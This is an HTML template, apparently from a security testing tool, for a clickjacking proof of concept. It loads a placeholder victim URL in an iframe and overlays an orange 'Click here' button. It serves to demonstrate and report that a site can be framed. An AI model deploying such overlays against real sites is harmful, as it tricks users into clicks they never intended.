<html>
<head>
    <title>Clickjacking POC</title>
    <style>
        body {{
            background-color: #f0f0f0;
            font-family: Arial, sans-serif;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            height: 100vh;
            margin: 0;
        }}
        .description {{
            text-align: center;
            margin-bottom: 20px;
            color: #333;
        }}
        h2 {{
            color: #000;
        }}
        p {{
            color: rgb(146, 83, 83);
            font-weight: bold;
        }}
        .container {{
            position: relative;
            width: 80%;
            max-width: 900px;
            height: 600px;
            border: 2px solid #ccc;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            background-color: #fff;
        }}
        .container iframe {{
            width: 100%;
            height: 100%;
            border: none;
            display: block;
        }}
        .overlay-button {{
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            padding: 20px 40px;
            font-size: 20px;
            font-weight: bold;
            color: #fff;
            background-color: #ff5722;
            border: none;
            cursor: pointer;
            opacity: 1;
            z-index: 10;
            border-radius: 5px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
        }}
        .overlay-button:hover {{
            background-color: #e64a19;
        }}
    </style>
</head>
<body>
    <div class="description">
        <h2>Clickjacking Vulnerability POC</h2>
        <p>This proof‑of‑concept demonstrates a clickjacking vulnerability, enabling unauthorized interaction and data access.</p>
        <p><strong>Vulnerable:</strong> {victim_url}</p>
    </div>
    <div class="container">
        <iframe src="{victim_url}"></iframe>
        <button class="overlay-button">Click here</button>
    </div>
</body>
</html>